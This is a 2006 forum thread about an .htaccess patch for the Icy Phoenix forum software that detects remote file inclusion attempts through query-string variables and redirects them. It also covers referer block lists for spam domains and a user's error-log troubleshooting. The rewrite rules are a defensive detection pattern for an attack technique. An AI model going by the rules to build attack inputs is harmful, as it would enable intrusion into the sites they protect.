Home •  Forum •  FAQ •  Search •  Recent Topics •  Memberlist •  Register •  Log in 
Forum » Icy Phoenix Support » Older Versions Archive » Old Patches

058-008 & 009 - HTACCESS & Errors

This topic is locked: you cannot edit posts or make replies.

 

Mighty Gorgon
Quote
Posts: 7192 Location: Borgo San Michele
Tue 29 Aug, 2006 10:09
Subject: 058-008 & 009 - HTACCESS & Errors
Hi all.

For all that cannot set REGISTER_GLOBALS to OFF, I've created this HTACCESS that may block hacking via RFI (Remote File Injection).

HTACCESS modification requires Apache Rewrite Engine set to ENABLED to work and is not needed for those who have REGISTER_GLOBALS set to OFF.

Here is the part to insert in your HTACCESS in the root of your site:

Code: [Download] [Hide] [Select]
##################################
# Block Hacking Attempts - BEGIN #
##################################
##################################
# CONDITIONS
##################################
# STRICT CONDITION
#RewriteCond %{QUERY_STRING} ^.*(phpbb_root_path|album_root_path|module_root_path|mx_root_path|upi2db_file_path).*$
# LESS STRICT CONDITION
RewriteCond %{QUERY_STRING} ^.*(phpbb_root_path=|album_root_path=|module_root_path=|mx_root_path=|upi2db_file_path=).*$
##################################
# REWRITE
##################################
# FORBIDDEN
#RewriteRule ^.*$ - [F,L]
# REDIRECT TO LOCALHOST
RewriteRule ^.*$ http://127.0.0.1/ [redirect,last]
##################################
##################################
# Block Hacking Attempts - END #
##################################


This will redirect all hacking attempts using the most common known vars (these should be the only used in XS, if you install other mods, you may want to add even other vars) to localhost of the hacker.

I left commented the opportunity to generate an error that will be logged by XS errors function which I attach here the new file.

So here attached you will find:
  • Premodified standard XS HTACCESS
  • New ERRORS.PHP file (replace the old with this one)


The file errors.php it's indipendent from HTACCESS, so you should apply this patch even if you are not modifying your HTACCESS


058_009_errors.zip
Description: 058-009 - Errors 
Download
Filename: 058_009_errors.zip
Filesize: 2.35 KB
Downloaded: 503 Time(s)
058_008_htaccess.zip
Description: 058-008 - HTACCESS 
Download
Filename: 058_008_htaccess.zip
Filesize: 5.21 KB
Downloaded: 458 Time(s)

Profile PM   Website
Nizzle
Quote
Posts: 152 Location: Dordrecht..
Tue 29 Aug, 2006 13:47
Subject: Re: 058-008 & 009 - HTACCESS & Errors
you've put my part in that .htacces :mrg:

BTW..
is there a site you can redirect them to..
which will let them crash or something
was thinking to redirect them to my own site
then they'll find the .htacces again
redirect again

bringing them into a loop
which makes them useless..

is there a site like that? :mrg:

Profile PM   Website
Lucky
Quote
Posts: 106
Tue 29 Aug, 2006 14:13
Subject: Re: 058-008 & 009 - HTACCESS & Errors
I have set REGISTER_GLOBALS to OFF. I don't need to change the .htaccess file ... I can leave original .htaccess !

But I must change the errors file.

I's all right ?

Profile PM  
Lucky
Quote
Posts: 106
Tue 29 Aug, 2006 14:23
Subject: Re: 058-008 & 009 - HTACCESS & Errors
In phpbb-seo they have suggest to me to make these change in .htaccess

1)

Move
Code: [Download] [Hide]
  1. #make sure the whole site goes to www.mysite.com  
  2. #instead of mysite.com. This is good for the search engines  
  3. #Edit and uncomment the below lines for your own site.  
  4. RewriteCond %{HTTP_HOST} ^mysite.org  
  5. RewriteRule (.*) http://www.mysite.com/>RewriteRule (.*) http://www.mysite.com/$1 [R=301,L]  < [R=301,L]  
  6.  


between

RewriteEngine On

and

RewriteBase /


2)

put [L] at the end of every RewriteRule

More details about this discussion you can find HERE

What do you think about it ?

Profile PM  
Mighty Gorgon
Quote
Posts: 7192 Location: Borgo San Michele
Thu 31 Aug, 2006 01:37
Subject: Re: 058-008 & 009 - HTACCESS & Errors
Nizzle wrote: [View Post]
you've put my part in that .htacces :mrg:

BTW..
is there a site you can redirect them to..
which will let them crash or something
was thinking to redirect them to my own site
then they'll find the .htacces again
redirect again

bringing them into a loop
which makes them useless..

is there a site like that? :mrg:

Great idea... we can buy a domain and do it! Then we will sell banners... :lol_flag:

Lucky wrote: [View Post]
I have set REGISTER_GLOBALS to OFF. I don't need to change the .htaccess file ... I can leave original .htaccess !

But I must change the errors file.

I's all right ?

Right! :wink:

Lucky wrote: [View Post]
In phpbb-seo they have suggest to me to make these change in .htaccess

...

What do you think about it ?

Yes it does make sense... :wink:

Profile PM   Website
Nizzle
Quote
Posts: 152 Location: Dordrecht..
Thu 31 Aug, 2006 18:12
Subject: Re: 058-008 & 009 - HTACCESS & Errors
got a new spammer site thingy..

Code: [Download] [Hide]
  1. 1awm.com 

Profile PM   Website
hpl
Quote
Posts: 302 Location: Trieste
Sat 02 Sep, 2006 10:44
Subject: Re: 058-008 & 009 - HTACCESS & Errors
this is ok for Aruba??...

Profile PM   Website
Mighty Gorgon
Quote
Posts: 7192 Location: Borgo San Michele
Sat 02 Sep, 2006 13:22
Subject: Re: 058-008 & 009 - HTACCESS & Errors
hpl wrote: [View Post]
this is ok for Aruba??...

Yes... it is working here.

Profile PM   Website
Nizzle
Quote
Posts: 152 Location: Dordrecht..
Mon 04 Sep, 2006 21:20
Subject: Re: 058-008 & 009 - HTACCESS & Errors
today I've found yet some others..

Code: [Download] [Hide]
  1. RewriteCond %{HTTP_REFERER} ^(.*)alcotour.com(.*)$ [OR]  
  2. RewriteCond %{HTTP_REFERER} ^(.*)goldadornment.com(.*)$ [OR]  
  3. RewriteCond %{HTTP_REFERER} ^(.*)mifec.org(.*)$ [OR]  
  4. RewriteCond %{HTTP_REFERER} ^(.*)1awm.com(.*)$ [OR]  
  5. RewriteCond %{HTTP_REFERER} ^(.*)toruc.org(.*)$ [OR] 


all from the same damn site

Profile PM   Website
fracs
Quote
Posts: 71 Location: Cosenza
Tue 19 Sep, 2006 09:06
Subject: Re: 058-008 & 009 - HTACCESS & Errors
My error log:

script '/home/cosenzau/cosenzaunited.org/html/errors.php' not found or unable to stat, referer: http://www.cosenzaunited.org/forum/...=quote&p=490842

and more of this.

Profile PM   Website AIM YIM MSN Skype ICQ
Mighty Gorgon
Quote
Posts: 7192 Location: Borgo San Michele
Wed 20 Sep, 2006 00:37
Subject: Re: 058-008 & 009 - HTACCESS & Errors
fracs wrote: [View Post]
My error log:

script '/home/cosenzau/cosenzaunited.org/html/errors.php' not found or unable to stat, referer: http://www.cosenzaunited.org/forum/...=quote&p=490842

and more of this.

It seems you are missing that file... or you may have to set a different path to errors.php... :roll:

Do you have your forum in a subfolder?

Profile PM   Website
fracs
Quote
Posts: 71 Location: Cosenza
Wed 20 Sep, 2006 08:13
Subject: Re: 058-008 & 009 - HTACCESS & Errors
error.php is in root of forum /forum/error.php, /html/ is root of the site...

0: [client 66.249.65.xxx] PHP Fatal error: Call to undefined function: session_pagestart() in /home/cosenzau/cosenzaunited.org/html/errors.php on line 49
1: [client 66.249.65.xxx] PHP Warning: main(): Failed opening './common.' for inclusion (include_path='.:/usr/share/pear') in /home/cosenzau/cosenzaunited.org/html/errors.php on line 24
2: [client 66.249.65.xxx] PHP Warning: main(./common.): failed to open stream: No such file or directory in /home/cosenzau/cosenzaunited.org/html/errors.php on line 24
3: [client 66.249.65.xxx] PHP Notice: Undefined variable: phpEx in /home/cosenzau/cosenzaunited.org/html/errors.php on line 24
4: [client 66.249.65.xxx] PHP Warning: main(): Failed opening './extension.inc' for inclusion (include_path='.:/usr/share/pear') in /home/cosenzau/cosenzaunited.org/html/errors.php on line 23
5: [client 66.249.65.xxx] PHP Warning: main(./extension.inc): failed to open stream: No such file or directory in /home/cosenzau/cosenzaunited.org/html/errors.php on line 23

Profile PM   Website AIM YIM MSN Skype ICQ
Nizzle
Quote
Posts: 152 Location: Dordrecht..
Sat 23 Sep, 2006 14:40
Subject: Re: 058-008 & 009 - HTACCESS & Errors
Mighty Gorgon wrote: [View Post]
Nizzle wrote: [View Post]
you've put my part in that .htacces :mrg:

BTW..
is there a site you can redirect them to..
which will let them crash or something
was thinking to redirect them to my own site
then they'll find the .htacces again
redirect again

bringing them into a loop
which makes them useless..

is there a site like that? :mrg:

Great idea... we can buy a domain and do it! Then we will sell banners... :lol_flag:


you'd get a shitload of visitors :mrg:
put it in the default .htacces for XS and you'll get even more :mro:

Profile PM   Website
This topic is locked: you cannot edit posts or make replies.
 

Page 1 of 1


  
You cannot post new topics
You cannot reply to topics
You cannot edit your posts
You cannot delete your posts
You cannot vote in polls
You cannot attach files
You can download files
You cannot post calendar events

   

This is a "Lo-Fi" version of our main content. To view the full version with more information, formatting and images, please click here.

Powered by Icy Phoenix based on phpBB
Generation Time: 0.1675s (PHP: 13% SQL: 87%)
SQL queries: 15 - Debug Off - GZIP Enabled